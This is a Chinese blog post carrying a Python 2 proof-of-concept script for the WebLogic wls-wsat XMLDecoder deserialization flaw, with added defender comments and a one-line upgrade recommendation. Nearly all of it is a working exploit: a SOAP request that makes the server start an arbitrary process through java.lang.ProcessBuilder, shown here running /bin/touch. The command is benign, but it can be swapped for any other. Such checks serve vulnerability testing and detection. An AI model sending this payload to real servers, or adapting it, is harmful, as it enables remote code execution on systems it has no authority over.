• Weblogic wls RCE 漏洞验证POC


    #!/usr/bin/env python
    # coding:utf-8
    # @Date    : 2017/12/22 17:11
    # @File    : weblogic_poc.py
    # @Author  : sevck 
    # @Link    : http://www.qingteng.cn                  
    #-------------------------------------------------------------------------  
    import requests
    import re
    from sys import argv
    
    # Headers sent with the probe request. The browser-like User-Agent and
    # Accept values mean filtering on the UA alone will not single this
    # traffic out; detection should key on the request path and on the
    # WorkContext header inside the SOAP body instead. Content-Type is
    # text/xml because the body below is a SOAP envelope.
    heads = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Content-Type': 'text/xml;charset=UTF-8'
        }
    
    def poc(url):
        """Probe one WebLogic host for the wls-wsat WorkContext deserialization flaw.

        A SOAP request whose WorkContext header carries a java.beans XML
        document is POSTed to /wls-wsat/CoordinatorPortType; the target is
        then classified from the <faultstring> element of the reply.

        url: host, host:port or full URL; "http://" is prepended when the
             value does not start with "http".
        returns: the string "Vulnerability" or "No Vulnerability".

        Defender notes:
          - This is a live check, not a version fingerprint: on an affected
            host the payload runs /bin/touch /tmp/weblogic, so that file is an
            on-host indicator that the probe succeeded. The network-side
            signal is a POST to /wls-wsat/CoordinatorPortType whose body
            contains a work:WorkContext header with a <java> element.
          - Remediation is to apply the vendor fix (the post's own advice is
            simply to upgrade).
        """
        if not url.startswith("http"):
            url = "http://" + url
        # NOTE(review): once a scheme is present the string always contains
        # "/", so this branch is unconditional; presumably a trailing-slash
        # check was intended.
        if "/" in url:
            url += '/wls-wsat/CoordinatorPortType'
        # Probe body: a document in the java.beans.XMLDecoder format that
        # instantiates java.lang.ProcessBuilder and calls start().
        post_str = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java>
                <void class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="2">
                    <void index="0">
                      <string>/bin/touch</string>
                    </void>
                    <void index="1">
                      <string>/tmp/weblogic</string>
                    </void>
                  </array>
                  <void method="start"/>
                </void>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>
        '''
    
        try:
            # verify=False disables TLS certificate validation; timeout=5
            # bounds the wait for an unresponsive host.
            response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
            response = response.text
            # Without re.DOTALL the match cannot span lines; when nothing
            # matches, .group(0) on None raises AttributeError, which the
            # handler below turns into an empty reply.
            response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
        except Exception, e:  # Python 2 syntax; also swallows connection errors
            response = ""
    
        # Either faultstring form is taken as a positive signal. Because all
        # errors collapse to "", an unreachable host is reported as
        # "No Vulnerability" rather than as an error.
        if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
            result = "Vulnerability"
            return result
        else:
            result = "No Vulnerability"
            return result
    
    
    # CLI entry point: exactly one positional argument (host, host:port or
    # URL) is read; with no argument a usage line is printed and the process
    # exits 0. Extra arguments are ignored.
    # NOTE: print statements are Python 2 syntax, as is the except clause in
    # poc(); the script does not run under Python 3 unmodified.
    if __name__ == '__main__':
        if len(argv) == 1:
            print "python weblogic_poc.py url:port"
            exit(0)
        else:
            url = argv[1]
        result = poc(url=url)
        print result

    说点修复建议:

    个人建议直接更新到最新版吧，老版本的问题还是太多。昨晚和廖师父聊天时得知他又提交了一个 WebLogic 的 RCE，已经拿到 CVE，正在等待发布。

  • 原文地址:https://www.cnblogs.com/sevck/p/8092760.html